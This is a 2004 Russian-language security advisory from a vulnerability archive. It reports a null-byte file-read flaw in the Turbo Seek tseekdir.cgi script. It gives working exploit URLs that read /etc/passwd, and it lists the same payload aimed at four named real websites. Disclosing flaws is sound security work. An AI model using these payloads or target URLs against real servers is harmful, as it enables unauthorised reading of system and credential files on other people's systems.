Просмотр файлов в Search Engine & Directory Powered by Turbo Seek от FocalMedia.Net

2004-09-10T00:00:00
ID SECURITYVULNS:DOC:6776
Type securityvulns
Reporter Securityvulns
Modified 2004-09-10T00:00:00

Description

Здравствуйте, 3APA3A.

нашел новую узвимость.

Просмотр файлов в Search Engine & Directory Powered by Turbo Seek от FocalMedia.Net

Software / Application - Search Engine & Directory Powered by Turbo Seek Problem-Type - удаленная Vulnerability - возможность чтения файлов. Vendor - FocalMedia.Net http://www.focalmedia.net Risk / Severity - средний Platforms - *.nix Details / DESCRIPTION - Скрипт tseekdir.cgi не выполняет проверку на "null-byte poison". Exploit - http://www.xxx.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00 http://www.xxx.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00

durito [durito@mail.ru] LwB Security Team [lwb57.org] Copyright 2002-2004 by LwB Security Team. All rights reserved.

Пример: http://www.uscomputer.net/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00 http://www.micro2media.com/cgi-bin/turbo/tseekdir.cgi?location=/etc/passwd%00 http://www.clickonbanner.com/cgi-bin/search2/cgi/tseekdir.cgi?id=316&location=/etc/passwd%00 http://www.americanquality.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00

-- С уважением, durito [LwB Security Team] mailto:durito@mail.ru http://lwb57.org http://durito.narod.ru